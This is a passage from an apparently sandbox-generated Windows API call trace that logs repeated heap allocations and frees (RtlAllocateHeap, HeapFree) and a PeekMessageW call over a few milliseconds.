lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.568] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.568] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.568] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.568] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.568] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.568] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.568] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.568] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.568] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.568] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.568] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.568] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.568] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.568] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.568] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.568] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.568] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.568] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.568] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.568] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.568] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.568] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.568] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.568] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.568] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.568] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.568] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.568] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.568] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.568] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.568] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.568] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.568] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.568] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.568] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.569] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.569] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.569] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.569] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.569] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.569] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.569] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.569] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.569] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.569] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.569] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.569] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.569] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.569] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.569] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.569] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.569] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.569] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.569] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.569] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.569] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.569] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.569] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.569] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.569] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.569] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.569] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.569] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.569] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.569] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.569] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.569] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.569] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.569] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.569] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.569] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.569] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.569] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 